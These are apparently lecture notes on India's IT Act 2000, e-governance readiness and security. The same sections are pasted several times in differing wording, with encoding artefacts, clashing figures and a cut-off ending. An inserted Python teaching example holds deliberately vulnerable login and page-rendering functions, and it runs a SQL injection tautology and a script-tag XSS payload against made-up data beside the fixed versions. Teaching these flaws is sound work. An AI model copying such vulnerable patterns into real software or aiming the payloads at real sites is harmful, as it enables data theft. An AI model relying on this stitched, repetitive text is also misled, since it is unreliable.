"Whoever publishes or transmits or causes to be published or transmitted in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S 67C - Preservation and retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."


IT ACT

The Information Technology Act, 2000 (also known as ITA-2000 or the IT Act) is an Act of the Indian Parliament (No. 21 of 2000) notified on October 17, 2000. The Act is opposed by the Save Your Voice campaign and other civil society organizations in India. The user-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of the IT Act, 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, adopted the Model Law on Electronic Commerce drawn up by the United Nations Commission on International Trade Law; this is referred to as the UNCITRAL Model Law on E-Commerce. Following the UN resolution, India passed the Information Technology Act, 2000 in May 2000, and it came into force on October 17, 2000. The Act has been substantially amended by the Information Technology (Amendment) Act, 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008, received Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act places additional focus on information security and adds several new sections on offences, including cyber terrorism and data protection. A set of Rules on sensitive personal information and reasonable security practices (under section 43A of the ITAA 2008) was notified in April 2011.

Provisions -

The Information Technology Act, 2000 consisted of 94 sections segregated into 13 chapters; four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced, and Schedules III and IV are deleted.

Information Technology Act 2000 addressed the following issues

1 Legal recognition of electronic documents

2 Legal Recognition of digital signatures

3 Offenses and contraventions

4 Justice dispensation systems for cybercrimes

Offences -

Section 65 - Tampering with computer source documents: intentional concealment, destruction or alteration of computer source code when that source code is required to be kept or maintained by law for the time being in force. Punishment: imprisonment up to three years, or fine up to 2 lakh rupees, or both.

Section 66 - Hacking (computer related offences). Punishment: imprisonment up to three years, or fine up to 5 lakh rupees, or both.

Section 66-A - Sending offensive messages through electronic means: sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will, etc., or sending such mail intended to deceive or mislead the addressee or recipient about the origin of the message. Punishment: imprisonment up to three years and fine.

Criticisms -

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some cyber law observers have criticized the amendments for their lack of legal and procedural safeguards to prevent violation of the civil liberties of Indians. Other observers have welcomed the amendments because they address the issue of cyber security.

Section 69 empowers the Central Government, a State Government or their authorized agency to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient to do so in the interest of the sovereignty or integrity of India, the defence of India, the security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for the investigation of any offence. They can also require assistance from computer personnel in decrypting data (mandatory decryption), under penalty of imprisonment.

Section 66A is widely criticized; it has led to numerous abuses reported by the press. Section 66A has also been criticized and challenged in the Lucknow and Madras High Courts on its constitutional validity. Relying on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can constitute a cyber crime. (Section 66A was subsequently struck down as unconstitutional by the Supreme Court of India in Shreya Singhal v. Union of India, 2015.)

Page 49: Web technology and commerce unit 4

PREPARED BY ARUN PRATAP SINGH 48

48

The Need to Set the Right Priorities ndash

Four Basic Dimensions of P3

Although each is unique all P3rsquos include four basic characteristics

Shared goals

Shared resources (time money expertise people)

Shared risks

Shared benefits

Benefits

Expedited project completion

Project cost savings

Improved quality

Use of private resources

Access to new sources of private capital

Two Major Steps

PREPARED BY ARUN PRATAP SINGH 49

49

Crafting the Partnership

Implementing the Partnership

Project Management -

Six Distinct Phases

Genesis

Whatrsquos the need

Whatrsquos driving the need rationale

Facility non-compliance natural disaster budget deficit

Is there a need for a PublicPrivate Partnership

PREPARED BY ARUN PRATAP SINGH 50

50

Preliminary Project Definition

Feasibility

Is a PublicPrivate Partnership feasible not only financially but practically Can it be

done

Market Research

EconomicFinancial Analysis

Program Budget and Schedule

Risk Analysis

Plan and Test

Final project definition

What is the best way to complete the project

Has the plan been thoroughly tested to assess market demand public and stakeholder

feedback and economics

Master ScheduleBudget

Political Climate

Any potential ldquofatal flawsrdquo that could derail the project

Procurement and Contracting

How do you choose and contract with the best-value private partner

Whatrsquos the best delivery method

Design-Bid-Build

Design-Build

Finance-Design-Build

What do current statutes allow

Procurement Approach

Sole Source RFP Low Bid

Risk Allocation between Public and private Partners

Structuring of ContractRisks and Rewards

PREPARED BY ARUN PRATAP SINGH 51

51

Implement

Environmental

Design

Permitting

Construction

Commissioning and Administration

Operate

Startup

Monitoring

Assessment

Enhancement

Contract Modifications

Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations

The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches

Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past

PREPARED BY ARUN PRATAP SINGH 52

52

five years as countries have made significant investments in their telecommunications infrastructure

SECURITY ISSUES IN E-GOVERNANCE

1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government

The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service

2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens

The process approach for information security management system ISMS encourages its users to emphasize the importance of

understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security

implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks

monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement

Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event

Example of organizational and technical measures to prevent unauthorized access and processing are shown

Protecting premises equipment and systems software including input-output units

PREPARED BY ARUN PRATAP SINGH 53

53

Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including

transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of

personal data Enabling subsequent determination of when individual personal data were entered into a

filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data

Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals

3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to

Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis

Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness

Continually improve its control environment Effectively achieve legal and regulatory compliance

There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information

Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies

PREPARED BY ARUN PRATAP SINGH 54

54

CYBER CRIME AND LAWS

The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment

or any offence against morality social order or any unjust or shameful act The ldquoOffence

is defined in the Code of Criminal Procedure to mean as an act or omission made

punishable by any law for the time being in force

Cyber Crime is emerging as a serious threat World wide governments police

departments and intelligence units have started to react

Cyber Crime is a term used to broadly describe criminal activity in which computers or

computer networks are a tool a target or a place of criminal activity and include everything

from electronic cracking to denial of service attacks It is also used to include traditional

crimes in which computers or networks are used to enable the illicit activity

Computer crime mainly consists of unauthorized access to computer systems data

alteration data destruction theft of intellectual property Cyber crime in the context of

national security may involve hacking traditional espionage or information warfare and

related activities

Pornography Threatening Email Assuming someones Identity Sexual Harassment

Defamation Spam and Phishing are some examples where computers are used to commit

crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking

are examples where computers become target of crime

Cyber Crime Variants

Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking had witnessed a 37 per cent increase in the year these notes were prepared.

Cyber Squatting
Cyber squatting is the act of registering a famous domain name and then selling it for a fortune. This is an issue that has not been tackled in the IT Act 2000.

Phishing
Phishing is just one of the many frauds on the Internet that try to fool people into parting with their money. Phishing refers to the receipt of unsolicited e-mails by customers of financial institutions, requesting them to enter their username, password or other personal information in order to access their account for some stated reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking
Cyber stalking is the use of the Internet or other electronic means to stalk someone. The term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.


Vishing
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "voice" and "phishing". Vishing exploits the public's trust in landline telephone services. Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base
121 million Internet users
65 million active Internet users, up by 28 per cent from 51 million in 2010
50 million users shop online on e-commerce and online shopping sites
46+ million social network users
346 million mobile users had subscribed to data packages


CYBER LAW

Section 66 (as originally enacted in the IT Act 2000) - Hacking with computer system
(1) Whoever with the intent to cause, or knowing that he is likely to cause, wrongful loss or damage to the public or any person, destroys or deletes or alters any information residing in a computer resource or diminishes its value or utility or affects it injuriously by any means, commits hack.
(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Section 43 - Penalty and compensation for damage to computer, computer system, etc.
Whoever, without permission of the owner of the computer,
secures access;
downloads, copies or extracts any data, computer database or any information;
introduces or causes to be introduced any virus or contaminant;
disrupts or causes disruption;
denies or causes denial of access to any person;
provides any assistance to any person to facilitate access;
charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system or computer network;
destroys, deletes or alters any information residing in a computer resource or diminishes its value or utility or affects it injuriously by any means;
steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage;
shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

Section 66 (as amended in 2008) - Computer related offences
"If any person, dishonestly or fraudulently, does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to three years or with fine which may extend to five lakh rupees or with both." [S66]

Section 66A - Punishment for sending offensive messages through communication service, etc.
Any person who sends, by means of a computer resource or a communication device,
(a) any information that is grossly offensive or has menacing character; or
(b) any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently by making use of such computer resource or a communication device; or
(c) any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience, or to deceive or to mislead the addressee or recipient about the origin of such messages,
shall be punishable with imprisonment for a term which may extend to three years and with fine.

Section 66C - Punishment for identity theft
"Whoever, fraudulently or dishonestly, makes use of the electronic signature, password or any other unique identification feature of any other person, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

Section 66D - Punishment for cheating by personation by using computer resource
"Whoever, by means of any communication device or computer resource, cheats by personation, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

Section 66E - Punishment for violation of privacy
"Whoever, intentionally or knowingly, captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both."

Section 67A - Punishment for publishing or transmitting of material containing sexually explicit act, etc., in electronic form
"Whoever publishes or transmits or causes to be published or transmitted in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

Section 67C - Preservation and retention of information by intermediaries
"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."


IT ACT

The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of the Indian Parliament (No. 21 of 2000) notified on October 17, 2000. The Act has been opposed by the Save Your Voice campaign and other civil society organizations in India. The user-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of the IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, adopted the Model Law on Electronic Commerce that had been adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce. Following the UN resolution, India passed the Information Technology Act 2000 in May 2000, and it came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It received Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences, including cyber terrorism and data protection. A set of Rules relating to sensitive personal information and reasonable security practices (referred to in section 43A of the ITAA 2008) was notified in April 2011.

Provisions -

The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced; Schedules III and IV are deleted.

The Information Technology Act 2000 addressed the following issues:
1. Legal recognition of electronic documents
2. Legal recognition of digital signatures
3. Offences and contraventions
4. Justice dispensation systems for cybercrimes

Offences -

Section, offence and punishment:

Section 65 - Tampering with computer source documents: intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force. Punishment: imprisonment up to three years, or/and fine up to 2 lakh rupees.

Section 66 - Hacking. Punishment: imprisonment up to three years, or/and fine up to 5 lakh rupees.

Section 66A - Sending offensive messages through electronic means: sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will, etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages. Punishment: imprisonment up to three years and with fine.

Criticisms-

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some cyber law observers have criticized the amendments on the ground of a lack of legal and procedural safeguards to prevent violation of the civil liberties of Indians. There has also been appreciation of the amendments from many observers because they address the issue of cyber security.

Section 69 empowers the Central Government, a State Government or its authorized agency to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient to do so in the interest of the sovereignty or integrity of India, the defence of India, the security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for the investigation of any offence. They can also secure assistance from computer personnel in decrypting data (mandatory decryption) under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime.


Crafting the Partnership
Implementing the Partnership
Project Management - Six Distinct Phases

Genesis
What's the need?
What's driving the need (rationale)? Facility non-compliance, natural disaster, budget deficit?
Is there a need for a Public/Private Partnership?

Preliminary Project Definition
Feasibility: is a Public/Private Partnership feasible, not only financially but practically? Can it be done?
Market Research
Economic/Financial Analysis
Program Budget and Schedule
Risk Analysis

Plan and Test
Final project definition
What is the best way to complete the project?
Has the plan been thoroughly tested to assess market demand, public and stakeholder feedback, and economics?
Master Schedule/Budget
Political Climate
Any potential "fatal flaws" that could derail the project?

Procurement and Contracting
How do you choose and contract with the best-value private partner?
What's the best delivery method? Design-Bid-Build, Design-Build, Finance-Design-Build
What do current statutes allow?
Procurement Approach: Sole Source, RFP, Low Bid
Risk Allocation between Public and Private Partners
Structuring of Contract: Risks and Rewards


Implement

Environmental

Design

Permitting

Construction

Commissioning and Administration

Operate

Startup

Monitoring

Assessment

Enhancement

Contract Modifications

Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest the efficiencies gained from ICT-enabled public administration.

The UN's e-government readiness index is a combined indicator of the supply of, potential demand for, and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure, a repository of electronic information on government laws and policies (including links to archived information and downloadable forms), and a high level of comfort with ICT among citizens and businesses. Countries with the highest readiness index also tend to have a large number of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries with the top three scores on the readiness index all share broadly similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites, one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services and is thus a leading indicator of countries' readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years, as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1. INTRODUCTION
The term e-Government is defined by the Organization for Economic Co-operation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services will depend heavily on the trust they have in the data security of the service.

2. INFORMATION SECURITY
A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens.

The process approach for an information security management system (ISMS) encourages its users to emphasize the importance of:
understanding an organization's information security requirements and the need to establish policy and objectives for information security;
implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks;
monitoring and reviewing the performance and effectiveness of the ISMS;
continual improvement based on objective measurement.

Data security requires a set of security requirements:
Authentication: the capability to identify who is using the services (a person or a software program); the process of verifying that you are who you say you are.
Authorization: the capability to grant rights of access to resources; the process of verifying that someone has the rights to do what she is trying to do.
Confidentiality: the capability to prevent unauthorized access to information.
Integrity: the capability to prevent unauthorized modification of information, ensuring that information can be relied upon and is accurate and complete.
Traceability: the capability to chronologically relate any transaction to the person or system that performed the action, in a way that is verifiable.
Non-repudiation: the capability to prevent a person or system that took part in an event or action from denying or challenging their participation in it.

Examples of organizational and technical measures to prevent unauthorized access and processing:
Protecting premises, equipment and systems software, including input-output units.
Protecting software applications used to process personal data.
Preventing unauthorized access to personal data during transmission, including transmission via telecommunication means and networks.
Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data.
Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and by whom, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data.

Although trusted security and privacy measures constitute a crucial success factor for e-Government, this has not yet been addressed: the UN 2012 Survey shows that only 20 per cent of national portals clearly indicate the presence of security features. Europe is leading, with 44 per cent of countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public organization web portals.

3. INFORMATION SECURITY THREATS
Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Examples of cyber attacks include techniques such as packet sniffers, probes, malware, Internet infrastructure attacks, denial of service attacks, remote-to-local attacks and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:
achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis;
maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness;
continually improve its control environment;
effectively achieve legal and regulatory compliance.

There are simple and well-known web application vulnerabilities that could be avoided, but e-Government websites are still vulnerable. A research study found 816 e-Government websites from 212 different countries to be vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection. An SQL injection attack can compromise data integrity, while XSS is a vulnerability which attackers may exploit to steal users' information.
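The paragraph above names the two defects without showing what they look like in code. The following Python program is an added example written for this page, not code from the original notes or from any of the surveyed e-Government sites. It builds a constructed in-memory SQLite table of portal users, runs a login lookup first with the input spliced into the SQL string and then with bound parameters, and renders a user-supplied display name into HTML first unescaped and then through html.escape. The table, user names, passwords and the injection payload are all made up for the example, and passwords are stored in clear text only to keep the example short (a real portal stores salted hashes).

```python
import html
import sqlite3

# Constructed sample data standing in for a portal's user table (not real accounts).
# Clear-text passwords are a simplification for this example only.
SAMPLE_USERS = [
    ("asha", "s3cret-1", "Asha Verma"),
    ("ravi", "s3cret-2", "Ravi Kumar"),
]


def build_db() -> sqlite3.Connection:
    """In-memory SQLite database holding the hypothetical users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, full_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Deliberately vulnerable: user input is spliced into the SQL text,
    so a quote in the input changes the query's structure."""
    query = (
        "SELECT username, full_name FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(query).fetchall()


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Hardened: bound parameters keep the input as data, never as SQL."""
    query = "SELECT username, full_name FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchall()


def render_vulnerable(display_name: str) -> str:
    """Reflects user-controlled text straight into the HTML response (XSS)."""
    return f"<p>Welcome, {display_name}</p>"


def render_safe(display_name: str) -> str:
    """Escapes HTML metacharacters so the input is shown as text, not parsed as markup."""
    return f"<p>Welcome, {html.escape(display_name, quote=True)}</p>"


def demo() -> dict:
    """Run both lookups and both renderings against a legitimate login,
    a classic tautology payload and a script-tag payload; return the results."""
    conn = build_db()
    injection = "' OR '1'='1"          # constructed SQL injection payload
    script = "<script>alert(1)</script>"  # constructed XSS payload
    return {
        "legit_vulnerable": login_vulnerable(conn, "asha", "s3cret-1"),
        "legit_safe": login_safe(conn, "asha", "s3cret-1"),
        # Unknown user, but the payload makes the WHERE clause always true:
        # ... AND password = '' OR '1'='1'  -> every row is returned.
        "attack_vulnerable": login_vulnerable(conn, "nobody", injection),
        # The same payload is compared literally against the password column.
        "attack_safe": login_safe(conn, "nobody", injection),
        "xss_vulnerable": render_vulnerable(script),
        "xss_safe": render_safe(script),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Running it shows the vulnerable lookup returning every row for an unknown user once the payload is supplied as the password, while the parameterized lookup returns nothing; likewise the escaped rendering turns `<script>` into `&lt;script&gt;`, which a browser displays as text instead of executing.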




Preliminary Project Definition

Feasibility

Is a Public/Private Partnership feasible, not only financially but practically? Can it be done?

Market Research

Economic/Financial Analysis

Program Budget and Schedule

Risk Analysis

Plan and Test

Final project definition

What is the best way to complete the project?

Has the plan been thoroughly tested to assess market demand, public and stakeholder feedback and economics?

Master Schedule/Budget

Political Climate

Any potential "fatal flaws" that could derail the project?

Procurement and Contracting

How do you choose and contract with the best-value private partner?

What's the best delivery method?

Design-Bid-Build

Design-Build

Finance-Design-Build

What do current statutes allow?

Procurement Approach

Sole Source, RFP, Low Bid

Risk Allocation between Public and Private Partners

Structuring of Contract/Risks and Rewards


Implement

Environmental

Design

Permitting

Construction

Commissioning and Administration

Operate

Startup

Monitoring

Assessment

Enhancement

Contract Modifications

Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest the efficiencies gained from ICT-enabled public administrations.

The UN's e-government readiness index is a combined indicator of the supply of, potential demand for, and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure; a repository of electronic information on government laws and policies, including links to archived information and downloadable forms; and a high level of comfort with ICT among citizens and businesses. Countries with the highest readiness index also tend to have a large number of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites: one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services, and thus a leading indicator of countries' readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years, as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1 INTRODUCTION. The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have in the data security of the service.

2 INFORMATION SECURITY. A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens.

The process approach for an information security management system (ISMS) encourages its users to emphasize the importance of:

understanding an organization's information security requirements and the need to establish policy and objectives for information security;

implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks;

monitoring and reviewing the performance and effectiveness of the ISMS, and continual improvement based on objective measurement.

Data security requires a set of security requirements:

Authentication: capability to identify who is using the services (person or software program); the process of verifying that you are who you say you are.

Authorization: capability to grant rights of access to resources; the process of verifying that someone has the rights to do what she is trying to do.

Confidentiality: capability to prevent unauthorized access to information.

Integrity: capability to prevent unauthorized modification of information and to ensure that information can be relied upon and is accurate and complete.

Traceability: capability to chronologically relate any transaction to the person or system that performed the action, in a way that is verifiable.

Non-repudiation: capability to prevent the person or system involved in an event or action from denying or challenging their participation in the event.

Examples of organizational and technical measures to prevent unauthorized access and processing are shown below:

Protecting premises, equipment and systems software, including input-output units.

Protecting software applications used to process personal data.

Preventing unauthorized access to personal data during transmission thereof, including transmission via telecommunication means and networks.

Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data.

Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and the person responsible, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data.

Trusted security and privacy measures constitute a crucial success factor for e-Government that has not yet been addressed: the UN 2012 Survey shows that only 20% of national portals clearly indicate the presence of security features. Europe is leading, with 44% of countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public organization web portals.

3 INFORMATION SECURITY THREATS. Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Detailed examples exist of cyber attacks using techniques such as packet sniffers, probes, malware, internet infrastructure attacks, denial of service attacks, remote-to-local attacks and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:

Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis.

Maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness.

Continually improve its control environment.

Effectively achieve legal and regulatory compliance.

There are simple and well-known web application vulnerabilities that could be avoided, but e-Government websites are still vulnerable. A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection. An SQL injection attack can compromise data integrity, while XSS is a vulnerability which attackers may exploit to steal users' information.
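An added example, not from the lecture notes, showing the two vulnerability classes named above in a mock e-Government citizen portal: a lookup and an e-mail update built by string concatenation beside their parameterized forms (injection disclosing, then overwriting, every record), and a results page with and without output encoding (XSS). The citizen records and the malicious inputs are constructed sample data; only the Python standard library is used.

```python
"""Added example (not from the lecture notes): SQL injection and XSS shown as
vulnerable e-Government citizen-portal functions beside their hardened forms.
Standard library only; citizen records and malicious inputs are constructed."""
import html
import sqlite3

# Constructed sample data standing in for an e-Government citizen register.
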